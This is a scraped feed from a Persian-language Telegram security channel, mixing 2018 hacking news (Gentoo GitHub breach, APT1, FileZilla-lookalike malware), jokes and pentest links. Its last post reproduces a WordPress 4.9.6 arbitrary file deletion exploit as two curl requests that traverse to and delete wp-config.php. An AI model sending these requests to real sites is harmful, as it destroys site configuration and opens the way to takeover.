امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
Son: "Dad, what are clouds made of?"

Dad: "Linux servers, mostly..."


#fun
#cloud

@sec_nerd
پیش بینی machine learning از بازیهای دور حذفی جام جهانی ۲۰۱۸


#worldcup
#ML

@sec_nerd
The way we programmers explain what we've written!

#dev
#fun

@sec_nerd
آموزش تست نفوذ وب سرویس های JSON با استفاده از تکنیک fuzzing


https://secapps.com/blog/2018/03/fuzzing-json-web-services


#api
#fuzzing
#pentest

@sec_nerd
اگر از filezilla استفاده میکنید مراقب بدافزاری که با پوشش این برنامه،‌سیستم های ویندوزی را آلوده میکند باشید!

https://forum.filezilla-project.org/viewtopic.php?t=48441


#news
#malware
#filezilla

@sec_nerd
گزارش شرکت امنیتی Mandiant در خصوص ارتباط گروه هکرهای چینی با کد APT1 که جزییات جالبی از نحوه شناسایی و فعالیتهای این گروه دارد:

شرکت Mandiant به دنبال شواهدی بود که نشان دهد APT1 ارتباط نزدیکی با ارتش آزادی بخش مردم چین (بصورت خلاصه PLA) دارد. mandia مطمئن بود که این هکرها زیرمجموعه واحد 61398 ارتش چین هستند و میدانست که متهم کردن ارتش چین در این عملیات، قدم بزرگی برای شرکتش به حساب می آید. آنها شواهد زیادی از شرکتهای هک شده و شواهد حضور هکرهای apt1 جمع آوری کرده بودند اما هیچ کدام از افراد این شرکت نمیتوانستند بصورت حضوری در واحدهای مشکوک کشور چین حضور یابند،‌چه بصورت فیزیکی و چه مجازی، زیرا ارتش چین آنها را از این کار منع میکرد.
در نهایت پس از تلاشهای فراوان کارشناسان mandiant توانستند با آلوده کردن لپ تاپ های هکرهای چینی، دوربین های این لپ تاپها را فعال کنند!
آنها میتوانستند تایپ کردن آنها را پشت میزهای کارشان ببینند.
تمام این هکرها مرد بودند، نزدیک ۲۵ سال سن داشتند، ساعت ۸ و نیم صبح به وقت شانگهای وارد محل کار میشدند، نتایج وزرشی را بررسی میکردند، به دوست دخترهای خود ایمیل میزدند و گاهی پورن تماشا میکردند!
ساعت ۹ حملات خود را به سیستم های مختلف در اقصی نقاط جهان آغاز میکردند و این کار تا زمان ناهار ادامه داشت. زمان استراحت بعد از ناهار هم اختصاص به کارهای صبح مانند ایمیل و پورن و ... داشت.
بر خلاف تصور نویسنده،‌این هکرها لباسهای نظامی و آرم و علائم نداشتند بلکه با ژاکت های چرم و گاهی عرقگیر کار میکردند و مشخص نیست که آنها با سفارش دولت یا شرکتها اقدام به هک میکردند یا نه!


تصاویر مربوط به این مطالب را در پست بعدی خواهید دید.
کتاب کامل این گزارش نیز از آمازون قابل تهیه است:
https://www.amazon.com/Perfect-Weapon-Sabotage-Fear-Cyber/dp/0451497899



#apt1
#news
#china


@sec_nerd
بکارگیری پاورشل توسط تیم های امنیتی با هدف مدیریت و مانیتورینگ رخدادها در ویندوز‌ (قسمت اول)

https://blog.varonis.com/practical-powershell-for-it-security-part-i-file-event-monitoring/


#windows
#ps
#security


@sec_nerd
ادامه دهنده عزیز
وقتی این کد رو مینوشتم،فقط من و خدا میدونستیم چیه.حالا فقط خدا میدونه!
اگر بهینه سازیت روی کد تموم شده(و شکست خوردی) برای هشدار دادن به نفر بعدی،عدد زیر رو زیاد کن

ساعتهای تلف شده:۶۷
بر اساس گزارش شرکت Big Brother Watch که یک شرکت طرفدار حفظ حریم خصوصی و آزادی های مدنی در بریتانیاست، سیستم صوتی درآمد و گمرکات ملکه صداهای بیش از 5.1 میلیون شهروند بریتانیا را بدون اطلاع آنها ضبط کرده است.
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.


منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/


#news
#britania
#privacy
#england


@sec_nerd
این میزان از شهامت در سال ۲۰۱۸ ستودنیه!

#windows
#smb
#win98
#eternalblue

@sec_nerd
wmi_slides.pdf
15.9 MB
حرکات جانبی در شبکه با استفاده از WMI

#windows
#network
#privesc
#lateral_movement


@sec_nerd
قابل توجه کاربران سیستم عامل Gentoo

روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.


منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html

#news
#linux
#github
#gentoo
#malware


@sec_nerd
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!

# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :

Step 1:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'


Step 2:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'



#wordpress
#wp
#exploit
#web
#pentest

@sec_nerd